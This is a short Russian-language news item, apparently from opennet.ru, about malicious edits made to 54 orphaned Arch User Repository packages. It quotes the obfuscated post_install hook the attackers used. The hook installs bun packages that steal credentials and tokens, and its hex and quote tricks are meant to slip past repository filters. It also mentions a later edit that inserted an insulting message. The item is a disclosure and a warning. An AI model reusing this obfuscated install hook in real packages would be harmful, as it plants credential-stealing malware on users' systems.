Несмотря на меры,
предпринятые разработчиками Arch Linux, деятельность по подстановке вредоносного кода в репозитории AUR (Arch User Repository) не остановлена. Несколько часов назад вредносный код
подставлен ещё в 54 пакета, оставшихся без сопровождающих (
история отмены вредоносных правок). В отличие от
позавчерашних атак, вместо пакетного менеджера npm для установки вредоносных зависимостей на этот раз задействована платформа
bun. Для обхода реализованных фильтров в функцию post_install
вставляется обфусцированная строка, в которой вызывается команда "bun add" для установки пакетов с вредоносным кодом, осуществляющим сканирование и отправку на внешний сервер ключей, токенов и учётных данных.
Код:
post_install() {
$'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
}
Дополнение:
Зафиксирована ещё одна атака на AUR, на этот раз вместо подстановки вредоносного ПО в несколько десятков пакетов, оставшихся без сопровождающего, был
добавлен вывод нецензурного сообщения на русском языке с оскорблением пользователей и предложением поменять дистрибутив или перестать использовать AUR.
Источник:
https://www.opennet.ru/opennews/art.shtml?num=65685
(opennet.ru, мини-новости)
